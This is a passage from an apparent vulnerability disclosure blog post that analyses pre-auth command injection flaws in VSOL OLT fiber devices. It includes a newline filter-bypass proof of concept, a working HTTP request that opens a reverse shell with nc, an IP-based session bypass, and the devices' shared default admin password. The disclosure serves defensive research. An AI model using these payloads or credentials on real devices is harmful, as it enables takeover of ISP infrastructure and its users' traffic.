<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">inputLength</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="n">index</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="c1">// No injection character found</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">currentChar</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="p">(</span><span class="n">byte</span><span class="w"> </span><span class="o">*</span><span class="p">)(</span><span class="n">input</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">index</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">currentChar</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">';'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xffffffff</span><span class="p">;</span><span class="w"> </span><span class="c1">// Semicolon</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">currentChar</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="sc">'<'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">currentChar</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'$'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xfffffffb</span><span class="p">;</span><span class="w"> </span><span class="c1">// Dollar sign</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">currentChar</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'&'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xfffffffd</span><span class="p">;</span><span class="w"> </span><span class="c1">// Ampersand</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">currentChar</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'`'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xfffffffc</span><span class="p">;</span><span class="w"> </span><span class="c1">// Backtick</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">currentChar</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'|'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xfffffffe</span><span class="p">;</span><span class="w"> </span><span class="c1">// Pipe</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">index</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">index</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="nb">true</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>The filter excludes the characters <code>;</code>, <code>$</code>, <code>&</code>, <code>`</code>, and <code>|</code>,
which are commonly used shell metacharacters for command chaining, variable
expansion, and piping. This measure helps mitigate many basic Command Injection
attempts by restricting these critical symbols in user supplied input before
shell execution. However, the filter does not block newline characters (<code>\n</code>),
which the shell interprets as command delimiters, similar to semicolons. This
allows us to insert newline characters to prematurely terminate the intended
command and start arbitrary commands on subsequent lines.</p>
<blockquote>
<p>💡 <u>Bypassing the filter using the <code>\n</code> character:</u></p>
<p>Because newline characters remain unfiltered, they provide a viable bypass
vector that effectively circumvents the blacklist, enabling Command Injection
despite the blocked characters. A good way to prove this point is to put it
into practice in a proof of concept.</p>
</blockquote>
<p>Reproducing the filter in C.</p>
<p>File: <span class="color-red">example_filter.c</span></p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><string.h></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">simple_filter</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">input</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">input</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">';'</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'$'</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'&'</span><span class="w"> </span><span class="o">||</span>
<span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'`'</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'|'</span><span class="p">)</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="n">input</span><span class="o">++</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">user_input</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"127.0.0.1</span><span class="se">\n</span><span class="s">id>/tmp/POC</span><span class="se">\n</span><span class="s">"</span><span class="p">;</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">command</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="n">fp</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">simple_filter</span><span class="p">(</span><span class="n">user_input</span><span class="p">))</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="n">snprintf</span><span class="p">(</span><span class="n">command</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">command</span><span class="p">),</span><span class="w"> </span><span class="s">"traceroute -m 15 %s > /tmp/tracetest"</span><span class="p">,</span><span class="w"> </span><span class="n">user_input</span><span class="p">);</span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Executing:</span><span class="se">\n</span><span class="s">%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">command</span><span class="p">);</span>
<span class="w"> </span><span class="n">fp</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">popen</span><span class="p">(</span><span class="n">command</span><span class="p">,</span><span class="w"> </span><span class="s">"r"</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">fp</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">perror</span><span class="p">(</span><span class="s">"popen failed"</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">pclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>The payload <code>8.8.8.8\n touch /tmp/pwned</code> bypasses the validation in <code>snmp_tracert_diagnose()</code>
because IP validation functions like <code>inet_aton()</code> only parse and validate the
initial part of the input string that corresponds to a valid IPv4 address. In
this case, <code>inet_aton()</code> successfully interprets the <code>8.8.8.8</code> prefix and
ignores the trailing newline and subsequent malicious command, treating the
entire string as valid input. Meanwhile, functions such as <code>gethostbyname()</code>
expect null terminated strings and do not sanitize or reject embedded newline
or shell metacharacters.</p>
<p>As a result, the validation passes even though the full input contains
characters that the shell can interpret as separate commands. This discrepancy
allows the injected newline and appended commands to reach the shell execution
stage unfiltered, enabling Command Injection despite the partial IP validation.</p>
<p>The vulnerability described above allows us to compromise all OLTs the cloud
manager can interact with, once the cloud manager itself has been compromised.
However, this vulnerability also enables the compromise of an Internet exposed
OLT with an accessible SNMP service, which in turn can be leveraged to
compromise the cloud manager itself, reversing the attack path.</p>
<h2 id="olts-command-injection-in-tacacs-login-authentication-feature-via-actionmainhtml-pre-auth_1">OLTs Command Injection in TACACS+ login authentication feature via <span class="color-blue">/action/main.html</span> (pre-auth)</h2>
<p>The <code>gpond</code> binary is responsible for managing the Web interface of the network
device.</p>
<p><a href="resources/2026-05-19_vsol/c27.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c27.png" width="70%"/></a></p>
<p class="center-text">Figure 27 - Pseudocode of function <code>web_main_init()</code>.</p>
<p></p>
<blockquote>
<p>📖 <u><a href="https://www.embedthis.com/goahead/doc/">GoAhead</a>[7]:</u></p>
<p>OLT's Web server is built on the <a href="https://www.embedthis.com/goahead/doc/ref/api/goahead.html">GoAhead framework</a>[8],
a lightweight embedded HTTP server commonly used in network devices.</p>
</blockquote>
<p><a href="resources/2026-05-19_vsol/c34.png">
<img class="align-center" height="60%" src="resources/2026-05-19_vsol/c34.png" width="60%"/>
</a></p>
<p>Based on my analysis of the <code>web_main_init()</code> function, authentication
appears to be handled by the function located at address <code>0x652e18</code> (depending
on the model and firmware version, this address can be retrieved through reverse
engineering).</p>
<p><a href="resources/2026-05-19_vsol/c28.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c28.png" width="70%"/></a></p>
<p class="center-text">Figure 28 - Pseudocode of function at <code>0x652e18</code> (part 1).</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c29.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c29.png" width="70%"/></a></p>
<p class="center-text">Figure 29 - Pseudocode of function at <code>0x652e18</code> (part 2).</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c30.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c30.png" width="70%"/></a></p>
<p class="center-text">Figure 30 - Pseudocode of function at <code>0x652e18</code> (part 3).</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c31.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c31.png" width="70%"/></a></p>
<p class="center-text">Figure 31 - Pseudocode of function at <code>0x652e18</code> (part 4).</p>
<p></p>
<p>By reading the pseudocode of the function located at address <code>0x652e18</code>, we can
construct the following diagram.</p>
<p><a href="resources/2026-05-19_vsol/c41.png">
<img class="align-center" height="75%" src="resources/2026-05-19_vsol/c41.png" width="75%"/>
</a></p>
<blockquote>
<p>💡 <u>TACACS+ authentication (Terminal Access Controller Access-Control System Plus):</u></p>
<p>TACACS+ is a network protocol for authentication, authorization, and accounting
(AAA), originally developed by Cisco in the 1990s, commonly used to control
access to network devices like routers, switches, and firewalls. TACACS+ is the
latest version of the TACACS protocol.
It is primarily used to authenticate users trying to access network devices
(e.g., via SSH, Telnet, Web. etc.). It communicates with a centralized TACACS+
server, which validates credentials and provides access control rules.</p>
</blockquote>
<p>It is important to note that when TACACS+ authentication is enabled, the
<code>web_tac_authen()</code> function is invoked with the username (first parameter) and
password (second parameter) provided by the user.</p>
<p>Analysis of this function reveals a Command Injection vulnerability. Both
parameters are inserted into a string using the <code>snprintf()</code> function, and the
resulting string is then passed directly as an argument to the function <code>system()</code>.</p>
<p><a href="resources/2026-05-19_vsol/c32.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c32.png" width="70%"/></a></p>
<p class="center-text">Figure 32 - Pseudocode of function <code>web_tac_authen()</code> (part 1).</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c33.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c33.png" width="70%"/></a></p>
<p class="center-text">Figure 33 - Pseudocode of function <code>web_tac_authen()</code> (part 2).</p>
<p></p>
<p>Consequently, the previously described vulnerability allows an OLT to be
compromised via Command Injection (through POST parameters <code>user</code> and <code>pass</code>)
when its Web interface is exposed to the Internet and TACACS+ authentication is
enabled.</p>
<h2 id="olts-command-injection-in-the-traceroute-feature-via-actiontracerthtml-pre-auth">OLTs Command Injection in the traceroute feature via <span class="color-blue">/action/tracert.html</span> (pre-auth)</h2>
<p>The <code>gpond</code> binary manages the Web interface of the network equipment. The route
to function mapping, that defines which function to execute for a given url path
is setup within function <code>web_maintenance_init()</code>.</p>
<h4 id="call-stack_2">Call stack</h4>
<ul>
<li><code>web_main_thread()</code><ul>
<li><code>web_main()</code><ul>
<li><code>p2p_Login_Init()</code><ul>
<li><code>web_maintenance_init()</code><ul>
<li><code>webs_diagnose_tracert()</code><ul>
<li><code>webs_diagnose_tracert_pthread()</code><ul>
<li><code>webs_diagnose_tracert_exec()</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h4 id="details-of-impacted-functions_2">Details of impacted functions</h4>
<p><a href="resources/2026-05-19_vsol/c35.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c35.png" width="70%"/></a></p>
<p class="center-text">Figure 34 - Pseudocode of function <code>web_maintenance_init()</code> (part 1).</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c36.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c36.png" width="70%"/></a></p>
<p class="center-text">Figure 35 - Pseudocode of function <code>web_maintenance_init()</code> (part 2).</p>
<p></p>
<p>By looking at route <span class="color-blue">tracert.html</span> (<span class="color-blue">/action/tracert.html</span>),
we see that it is function <code>webs_diagnose_tracert()</code> that is being executed.</p>
<p><a href="resources/2026-05-19_vsol/c37.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c37.png" width="70%"/></a></p>
<p class="center-text">Figure 36 - Pseudocode of function <code>webs_diagnose_tracert()</code>.</p>
<p></p>
<p>What is important to note is that global variable <code>tracert_ipaddr</code> takes the
value of a user defined input via call to <code>strcpy()</code> from a value populated by
<code>websGetVar()</code>, related to the <code>ipaddr</code> POST parameter.</p>
<p>Then the function <code>webs_diagnose_tracert_pthread()</code> is called during further
execution of the function.</p>
<blockquote>
<p>🕷️ <u>Presence of a trivial Buffer Overflow:</u></p>
<p>The buffer overflow in the global variable <code>tracert_ipaddr</code> caused
by the call to <code>strcpy()</code> is intentionally ignored, as our focus is
on the Command Injection vulnerability, which presents a more direct and
impactful exploitation path.</p>
</blockquote>
<p><a href="resources/2026-05-19_vsol/c38.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c38.png" width="70%"/></a></p>
<p class="center-text">Figure 37 - Pseudocode of function <code>webs_diagnose_tracert_pthread()</code>.</p>
<p></p>
<p>The third argument (the routine) is defined as the function <code>webs_diagnose_tracert_exec()</code>.</p>
<p><a href="resources/2026-05-19_vsol/c39.png">
<img class="align-center" height="70%" src="resources/2026-05-19_vsol/c39.png" width="70%"/></a></p>
<p class="center-text">Figure 38 - Pseudocode of function <code>webs_diagnose_tracert_exec()</code>.</p>
<p></p>
<p>The Command Injection occurs when the above function is invoked, allowing an
attacker to pass controlled input directly to the <code>system()</code> function, which
results in the execution of a malicious command.</p>
<p><u>Request to get a reverse shell:</u></p>
<div class="highlight"><pre><span></span><code><span class="nf">POST</span> <span class="nn">/action/tracert.html</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="o">:</span> <span class="l">192.168.8.200</span>
<span class="na">Content-Type</span><span class="o">:</span> <span class="l">application/x-www-form-urlencoded</span>
<span class="na">Content-Length</span><span class="o">:</span> <span class="l">84</span>
<span class="nt">who</span><span class="o">=</span><span class="s">1</span><span class="p">&</span><span class="nt">ipaddr</span><span class="o">=</span><span class="s">$(mknod /tmp/bp p;/bin/bash 0</tmp/bp | nc 192.168.8.199 1337 >/tmp/bp)</span>
</code></pre></div>
<p><u>Response:</u></p>
<div class="highlight"><pre><span></span><code><span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span>
<span class="na">Date</span><span class="o">:</span> <span class="l">Thu Jan 1 00:24:41 1970</span>
<span class="na">Connection</span><span class="o">:</span> <span class="l">keep-alive</span>
<span class="na">Content-Type</span><span class="o">:</span> <span class="l">text/html</span>
<span class="na">X-Frame-Options</span><span class="o">:</span> <span class="l">SAMEORIGIN</span>
<span class="na">Content-Length</span><span class="o">:</span> <span class="l">1754</span>
<span class="p"><</span><span class="nt">html</span><span class="p">><</span><span class="nt">head</span><span class="p">><</span><span class="nt">meta</span> <span class="na">charset</span><span class="o">=</span><span class="s">"utf-8"</span><span class="p">/></span> <span class="p"><</span><span class="nt">meta</span> <span class="na">http-equiv</span><span class="o">=</span><span class="s">"X-UA-Compatible"</span> <span class="na">content</span><span class="o">=</span><span class="s">"IE=edge,chrome=1"</span><span class="p">/></span> <span class="p"><</span><span class="nt">meta</span> <span class="na">http-equiv</span><span class="o">=</span><span class="s">"Content-Type"</span> <span class="na">content</span><span class="o">=</span><span class="s">"text/html"</span> <span class="p">/></span> <span class="p"><</span><span class="nt">title</span><span class="p">></span>OLT Web Management Interface<span class="p"></</span><span class="nt">title</span><span class="p">><</span><span class="nt">link</span> <span class="na">href</span><span class="o">=</span><span class="s">"/css/btn.css"</span> <span class="na">rel</span><span class="o">=</span><span class="s">"stylesheet"</span> <span class="na">type</span><span class="o">=</span><span class="s">"text/css"</span> <span class="p">/><</span><span class="nt">link</span> <span class="na">href</span><span class="o">=</span><span class="s">"/css/stylemain.css"</span> <span class="na">rel</span><span class="o">=</span><span class="s">"stylesheet"</span> <span class="na">type</span><span class="o">=</span><span class="s">"text/css"</span> <span class="p">/><</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">"/js/jquery-1.7.1.min.js"</span> <span class="na">type</span><span class="o">=</span><span class="s">"text/javascript"</span> <span class="p">></</span><span class="nt">script</span><span class="p">></span> <span class="p"><</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">"/js/jquery.i18n.properties-1.0.9.js"</span> <span class="na">type</span><span class="o">=</span><span class="s">"text/javascript"</span> <span class="p">></</span><span class="nt">script</span><span class="p">></span> <span class="p"><</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">"/js/language.js"</span> <span class="na">type</span><span class="o">=</span><span class="s">"text/javascript"</span> <span class="p">></</span><span class="nt">script</span><span class="p">></span> <span class="p"><</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">"/js/mainPage.js"</span> <span class="na">type</span><span class="o">=</span><span class="s">"text/javascript"</span> <span class="p">></</span><span class="nt">script</span><span class="p">></span> <span class="p"><</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">"/js/misc.js?rand=65033"</span> <span class="na">type</span><span class="o">=</span><span class="s">"text/javascript"</span> <span class="p">></</span><span class="nt">script</span><span class="p">><</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">"/js/maintenance.js?rand=12194"</span> <span class="na">type</span><span class="o">=</span><span class="s">"text/javascript"</span><span class="p">></</span><span class="nt">script</span><span class="p">></</span><span class="nt">head</span><span class="p">><</span><span class="nt">script</span> <span class="na">language</span><span class="o">=</span> <span class="s">"javascript"</span><span class="p">></span><span class="w"> </span><span class="kd">function</span><span class="w"> </span><span class="nx">setRefresh</span><span class="p">()</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"tracert_refresh"</span><span class="p">).</span><span class="nx">click</span><span class="p">();</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="nb">window</span><span class="p">.</span><span class="nx">setInterval</span><span class="p">(</span><span class="s1">'setRefresh()'</span><span class="p">,</span><span class="w"> </span><span class="mf">5000</span><span class="p">);</span><span class="w"> </span><span class="p"></</span><span class="nt">script</span><span class="p">><</span><span class="nt">body</span> <span class="na">onload</span><span class="o">=</span><span class="s">"setLanguage(0,'manage');"</span><span class="p">></span> <span class="p"><</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">"right_content"</span> <span class="na">id</span><span class="o">=</span><span class="s">"div_1"</span><span class="p">></span> <span class="p"><</span><span class="nt">form</span> <span class="na">name</span><span class="o">=</span><span class="s">form</span> <span class="na">method</span><span class="o">=</span><span class="s">post</span> <span class="na">action</span><span class="o">=</span><span class="s">"tracert.html"</span> <span class="p">><</span><span class="nt">b</span><span class="p">><</span><span class="nt">span</span><span class="p">><</span><span class="nt">font</span> <span class="na">data-i18N-text</span><span class="o">=</span><span class="s">'tracertTestResult'</span><span class="p">></span>Tracert Test Result<span class="p"></</span><span class="nt">font</span><span class="p">></</span><span class="nt">span</span><span class="p">></</span><span class="nt">b</span><span class="p">><</span><span class="nt">br</span><span class="p">><</span><span class="nt">br</span><span class="p">><</span><span class="nt">table</span> <span class="na">border</span><span class="o">=</span><span class="s">0</span> <span class="na">cellpadding</span><span class="o">=</span><span class="s">0</span> <span class="na">cellspacing</span><span class="o">=</span><span class="s">1</span> <span class="na">class</span><span class="o">=</span><span class="s">'right_table'</span><span class="p">><</span><span class="nt">tr</span><span class="p">><</span><span class="nt">td</span><span class="p">></span><span class="ni">&nbsp;&nbsp;&nbsp;</span>traceroute to 1.1.1.1 (1.1.1.1), 15 hops max, 46 byte packets
<span class="p"></</span><span class="nt">td</span><span class="p">></</span><span class="nt">tr</span><span class="p">><</span><span class="nt">tr</span><span class="p">><</span><span class="nt">td</span><span class="p">></span><span class="ni">&nbsp;&nbsp;&nbsp;</span> 1<span class="p"></</span><span class="nt">td</span><span class="p">></</span><span class="nt">tr</span><span class="p">></</span><span class="nt">table</span><span class="p">><</span><span class="nt">br</span><span class="p">></span> <span class="p"><</span><span class="nt">table</span> <span class="na">border</span><span class="o">=</span><span class="s">0</span> <span class="na">cellpadding</span><span class="o">=</span><span class="s">0</span> <span class="na">cellspacing</span><span class="o">=</span><span class="s">1</span> <span class="na">class</span><span class="o">=</span><span class="s">'right_table'</span><span class="p">></span> <span class="p"><</span><span class="nt">tr</span><span class="p">><</span><span class="nt">td</span><span class="p">><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"submit"</span> <span class="na">data-i18n-value</span><span class="o">=</span><span class="s">"refresh"</span> <span class="na">onClick</span><span class="o">=</span><span class="s">"whichfun(3)"</span> <span class="na">name</span><span class="o">=</span><span class="s">'tracert_refresh'</span> <span class="na">id</span><span class="o">=</span><span class="s">'tracert_refresh'</span> <span class="na">class</span><span class="o">=</span><span class="s">"btn"</span> <span class="p">></</span><span class="nt">td</span><span class="p">></span> <span class="p"></</span><span class="nt">tr</span><span class="p">></</span><span class="nt">table</span><span class="p">><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">hidden</span> <span class="na">name</span><span class="o">=</span><span class="s">who</span> <span class="na">value</span><span class="o">=</span><span class="s">100/</span><span class="p">></</span><span class="nt">form</span><span class="p">></</span><span class="nt">body</span><span class="p">></span> <span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p><a href="resources/2026-05-19_vsol/c40.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c40.png" width="100%"/></a></p>
<p class="center-text">Figure 39 - Exploitation of a Command Injection in the traceroute feature via the Web interface.</p>
<p></p>
<h4 id="why-is-the-traceroute-feature-via-web-interface-is-exploitable-without-authentication">Why is the traceroute feature (via Web interface) is exploitable without authentication?</h4>
<p>I asked myself, "Why is the traceroute feature accessible via the Web interface
exploitable without authentication?". As shown in the previous screenshot, no
cookies are set, yet the request is still accepted, even though, based on
binary analysis, an authentication mechanism appears to be present. So I looked
into the functions responsible for managing the authentication mechanism and
was able to summarize their behavior as follows.</p>
<p>The Web session management system uses a static in memory array of session slots.
Each slot is a fixed size structure (likely 296 bytes or <code>0x128</code>). Sessions are
identified using user specific data, assigned a session ID, and given timeout
values. The function <code>session_one_create()</code> initializes a session with user
information and generates a session ID. <code>session_time_init()</code> clears all session
memory at boot or logout. <code>session_get_user()</code> and <code>session_one_login_check()</code>
search for a matching active session and perform validation or cleanup.
<code>set_web_session_timeout()</code> updates the timeout field for all active sessions.
These functions operate on the same memory layout, showing a structured session
pool.</p>
<p><br/></p>
<table class="table table-striped">
<thead>
<th>Function</th>
<th>Description</th>
<th>Key Operations</th>
<th>Memory Region Used</th>
</thead>
<tbody>
<tr>
<td><code>session_one_create()</code></td>
<td>Allocates a session slot, assigns user and IP, generates session ID.</td>
<td>Stores session info, logs login.</td>
<td><code>web_user_session + offset</code></td>
</tr>
<tr>
<td><code>session_time_init()</code></td>
<td>Clears all session slots.</td>
<td><code>memset()</code> entire slot array.</td>
<td><code>web_user_session</code> to <code>loginName</code></td>
</tr>
<tr>
<td><code>session_get_user()</code></td>
<td>Searches for active session matching user data.</td>
<td>Compares session IP with input.</td>
<td><code>DAT_00f854f8 + (index x 0x128)</code></td>
</tr>
<tr>
<td><code>session_one_login_check()</code></td>
<td>Logs a user out and resets their session.</td>
<td>Finds session, clears it, updates <code>web_posport</code>.</td>
<td>Same session block.</td>
</tr>
<tr>
<td><code>set_web_session_timeout()</code></td>
<td>Sets timeout for each active session.</td>
<td>Sets value at offset <code>+0x0</code> if session is active.</td>
<td><code>DAT_00f854f4 + (index x 0x128)</code></td>
</tr>
</tbody>
</table>
<p><br/></p>
<p>According to my analysis, the structure of a slot is defined as follows:</p>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Field</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x000</td>
<td><code>int active</code></td>
<td>Indicates if the session is in use (<code>1</code> = active).</td>
</tr>
<tr>
<td>0x004</td>
<td><code>int timeout_seconds</code></td>
<td>Timeout value (set by <code>set_web_session_timeout</code>).</td>
</tr>
<tr>
<td>0x05C</td>
<td><code>char session_id[...];</code></td>
<td>Generated session ID string.</td>
</tr>
<tr>
<td>0x0A0</td>
<td><code>char user_ip[...];</code></td>
<td>Copied from <code>param_9 + 0x100</code>.</td>
</tr>
<tr>
<td>0x0E0</td>
<td><code>char username[...];</code></td>
<td>Copied from <code>param_10</code>.</td>
</tr>
<tr>
<td>0x120</td>
<td><code>int user_flag</code></td>
<td>Custom flag or permission.</td>
</tr>
<tr>
<td>0x124</td>
<td><code>int web_posport_mask</code></td>
<td>Used in logout logic (<code>session_one_login_check</code>).</td>
</tr>
</tbody>
</table>
<p><br/></p>
<blockquote>
<p>I am not an expert in reverse engineering, so if you notice any mistakes or
inaccuracies, please do not hesitate to let me know. I am just a humble
pentester doing his best.</p>
</blockquote>
<p>The core issue causing the authentication bypass lies in how the Web interface
manages user sessions. Sessions are tied directly to IP addresses instead of
more secure authentication tokens such as cookies. This design flaw means that
any request originating from an already authenticated IP address is
automatically accepted, regardless of whether the user has successfully
authenticated.</p>
<p>As explained earlier, the session management system uses a fixed array of
session slots stored in memory, each representing an active user session. Each
slot stores details like the user's IP address, username, session ID, and
timeout information. The Web interface validates sessions primarily by matching
incoming requests against the IP addresses stored in these slots. Therefore, if
an attacker shares the same IP address as an already authenticated user or can
spoof an IP address, they can bypass authentication entirely.</p>
<h2 id="olts-default-credentials">OLTs Default Credentials</h2>
<p>The fact that all OLT models and firmware versions share the same default
credentials <code>admin</code>/<code>Xpon@Olt9417#</code> for their Web administration interface
poses a significant security risk. An attacker can easily gain access to any
exposed device without needing to exploit any vulnerabilities. Moreover, this
risk becomes even more severe when as presented the Web interface includes
vulnerable features like traceroute, which in this case allows the execution
of arbitrary commands with <code>root</code> privileges.</p>
<h2 id="conclusion">Conclusion</h2>
<p>The exposed findings demonstrate that it is possible to compromise an entire
fleet of OLTs and ultimately gain control over an ISP's network by chaining
together multiple trivial vulnerabilities.</p>
<p>An attacker who successfully compromises the entire fleet of an operator's OLTs
gains a strategic position within the network infrastructure. With this level
of access, they could intercept, monitor, or manipulate user traffic at scale,
enabling mass surveillance, data theft, or the injection of malicious content.</p>
<p>Service disruption is also a serious risk, as the attacker could degrade or
completely cut off internet access for thousands or even millions of users.
Additionally, compromised OLTs could be used as a launchpad for further attack
against the core network or external targets, effectively turning the
operator's infrastructure into a powerful botnet. In the hands of a state actor,
such control could be exploited for espionage, censorship, or coordinated
cyberattacks.</p>
<p>This scenario highlights the critical need for stronger security measures in
ISP infrastructure. Above all, it is essential to avoid exposing OLTs or
